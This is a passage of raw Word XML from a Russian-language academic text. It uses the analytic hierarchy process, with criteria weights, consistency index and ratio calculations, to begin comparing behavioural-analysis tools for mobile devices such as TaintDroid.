            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,02865</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019"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0,459154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,030944</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К8</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2,00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3,00</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0,72203</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,04866</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00124ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К9</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758" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>4,326749</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,291593</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00124ABE" w:rsidTr="00124ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019"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r>
    </w:tbl>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ванности (ИС) согласно формуле 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C118F3" w:rsidTr="00C118F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C118F3" w:rsidRDefault="00C118F3" w:rsidP="00C118F3">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C118F3" w:rsidRDefault="00C118F3" w:rsidP="00C118F3">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C118F3" w:rsidRDefault="00C118F3" w:rsidP="00C118F3">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidR="00984403">
        <w:t xml:space="preserve">де </w:t>
      </w:r>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 xml:space="preserve"> </m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00984403" w:rsidRPr="00962B68">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00984403">
        <w:t>вычисляется по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00962B68" w:rsidRPr="00962B68">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C118F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984403" w:rsidRDefault="00C118F3" w:rsidP="00C118F3">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="0019431F">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>количество сравниваемых параметров.</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C118F3" w:rsidTr="00C118F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C118F3" w:rsidRDefault="00F870DF" w:rsidP="00712B2B">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>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Ε</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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C118F3" w:rsidRDefault="00C118F3" w:rsidP="00C118F3">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00962B68" w:rsidRPr="00F5445F" w:rsidRDefault="00962B68" w:rsidP="00F5445F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F5445F" w:rsidRPr="00712B2B" w:rsidRDefault="00712B2B" w:rsidP="00712B2B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidR="00F5445F">
        <w:t xml:space="preserve">де </w:t>
      </w:r>
      <m:oMath>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j</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t xml:space="preserve"> </m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00F5445F" w:rsidRPr="00F5445F">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сумма показателей превосходства </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00712B2B">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">го параметра над </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00712B2B">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>ым,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5445F" w:rsidRPr="00A012F4" w:rsidRDefault="00F870DF" w:rsidP="00712B2B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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F5445F" w:rsidRPr="00F5445F">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00A012F4" w:rsidRPr="00A012F4">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A012F4">
        <w:t>ый элемент ловакльного вектора приоритетов сравниваемых параметров.</w:t>
      </w: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 xml:space="preserve">представлены в таблице </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11D21" w:rsidRDefault="00F11D21" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6635B">
        <w:t>Величины случайной согласованности в зависимости от размерности изучаемой матрицы парных сравнений</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2088"/>
        <w:gridCol w:w="725"/>
        <w:gridCol w:w="725"/>
        <w:gridCol w:w="725"/>
        <w:gridCol w:w="725"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="726"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F11D21" w:rsidTr="00F11D21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2217" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Размерность матрицы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F11D21" w:rsidTr="00D6635B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2217" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Величина случайной согласованности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>0,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>0,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>0,58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>0,90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRPr="007A2ABE" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="798" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F11D21" w:rsidRDefault="00F11D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2ABE">
              <w:t>1,49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D6635B" w:rsidTr="00D6635B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D6635B" w:rsidRDefault="00D6635B" w:rsidP="00F11D21">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>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r>
    </w:tbl>
    <w:p w:rsidR="00F5445F" w:rsidRDefault="00F11D21" w:rsidP="00B8529C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Таким образом, для оценки важности критериев имеем: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934D3" w:rsidTr="00B934D3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B934D3" w:rsidRPr="00B934D3" w:rsidRDefault="00F870DF" w:rsidP="00B934D3">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=10,14408</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B934D3" w:rsidTr="00B934D3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B934D3" w:rsidRPr="00B934D3" w:rsidRDefault="00B934D3" w:rsidP="00B934D3">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>ИС=</m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    <w:lang w:val="en-US"/>
                  </w:rPr>
                  <m:t>0,14301</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B934D3" w:rsidTr="00B934D3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B934D3" w:rsidRDefault="00B934D3" w:rsidP="00B934D3">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>СС=1,45</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F11D21" w:rsidRDefault="00F11D21" w:rsidP="00B8529C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>На данном этапе найдет отношение согласованности (ОС)</w:t>
      </w:r>
      <w:r w:rsidR="00B934D3">
        <w:t xml:space="preserve"> по формуле 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B934D3" w:rsidTr="00AE3722">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B934D3" w:rsidRPr="00B934D3" w:rsidRDefault="00B934D3" w:rsidP="00AE3722">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>ОС=</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=0,098628</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B934D3" w:rsidRDefault="00B934D3" w:rsidP="00AE3722">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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t>Произведем попарное сравнение анализируемых альтернатив</w:t>
      </w:r>
      <w:r w:rsidR="00F11D21">
        <w:t xml:space="preserve"> аналогично приведенным ранее рассуждениям</w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>. В таблице 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> представлено сравнение средств поведенческого анализа МПУ по </w:t>
      </w:r>
      <w:r w:rsidR="00DF2AB7">
        <w:t>возможности проведения</w:t>
      </w:r>
      <w:r w:rsidR="00DF2AB7" w:rsidRPr="00DF2AB7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF2AB7">
        <w:t>непрерывного анализа в режиме реального времени</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019431F" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>5</w:t>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561"/>
        <w:gridCol w:w="1619"/>
        <w:gridCol w:w="1540"/>
        <w:gridCol w:w="1561"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1585"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E9217A" w:rsidTr="009915DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00E9217A" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00E9217A" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>TaintDroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E9217A" w:rsidRPr="00D6635B" w:rsidRDefault="00E9217A" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
